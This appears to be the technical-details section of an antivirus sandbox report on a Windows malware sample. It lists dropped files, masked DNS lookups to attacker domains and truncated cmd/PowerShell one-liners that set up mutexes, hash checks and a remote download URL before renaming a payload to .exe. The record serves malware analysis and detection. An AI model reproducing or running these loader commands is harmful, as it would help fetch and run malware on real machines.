Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\bq74txjwnk.exe' -
- %TEMP%\m6.bin.ori
- %TEMP%\m6.bin.exe
- 'localhost':43669
- 'do##.#qlnetcat.com':80
- DNS ASK do##.#qlnetcat.com
- DNS ASK t.###catkit.com
- '<SYSTEM32>\cmd.exe' /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='http://do##.##...
- '<SYSTEM32>\cmd.exe' /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://do##...
- '<SYSTEM32>\cmd.exe' /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9b28ee068d8292e0dacea0f044082868';$ifp=$env:tmp+'\kr.bin';$down_url='http://do##.##...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='http://...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9b28ee068d8292e0dacea0f044082868';$ifp=$env:tmp+'\kr.bin';$down_url='http://...
- '<SYSTEM32>\cmd.exe' /c copy /y %TEMP%\m6.bin.ori %TEMP%\m6.bin.exe